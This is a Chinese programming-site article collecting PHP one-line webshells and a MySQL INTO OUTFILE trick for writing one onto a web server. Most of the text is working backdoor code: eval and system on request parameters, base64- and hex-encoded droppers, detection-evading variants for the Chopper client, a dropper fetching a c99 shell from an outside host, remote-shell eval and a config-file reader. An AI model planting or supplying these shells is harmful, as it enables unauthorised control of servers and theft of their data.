经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 程序设计 » PHP » 查看文章
PHP与SQL语句写一句话木马总结
来源:jb51  时间:2019/10/12 9:03:06  对本文有异议

一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:

  1. <?php @eval($_GET["code"])?>
  2.  
  3. <?php @system($_POST["cmd"])?>

二、编码的替换的类型:

  1. <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
  2.  
  3. //会生成<?php @eval($_POST['lostwolf']);?>
  4.  
  5.  
  6. <script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>
  7.  
  8. //php在html内部的一种嵌入方式
  9.  
  10.  
  11. <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>
  12.  
  13.  
  14.  
  15. <?php
  16.  
  17. session_start();
  18.  
  19. $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
  20.  
  21. $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

三、其他类型:

  1. <?php $_GET[a]($_GET[b]);?>
  2.  
  3. //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
  4.  
  5. <?php assert($_REQUEST["pass"]);?> //菜刀连接 躲避检测 密码pass
  6.  
  7. <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>
  8.  
  9. //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass

四、下载类型:

  1. <?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?>
  2.  
  3. <? echo file_get_contents("..//cfg_database.php");?> //显示某文件
  4.  
  5. <? eval ( file_get_contents("远程shell")) ?> //运行远程shell

五、无关键函数类型:

  1. <?php
  2.  
  3. $_="";
  4.  
  5. $_[+""]='';
  6.  
  7. $_="$_"."";
  8.  
  9. $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
  10.  
  11. ?>
  12.  
  13. <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
  14.  
  15. http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass
  16.  
  17. <?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

六、补充知识点:

SQL写一句话(MySQL):

  1. select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
  2.  
  3. #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对w3xue的支持。

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号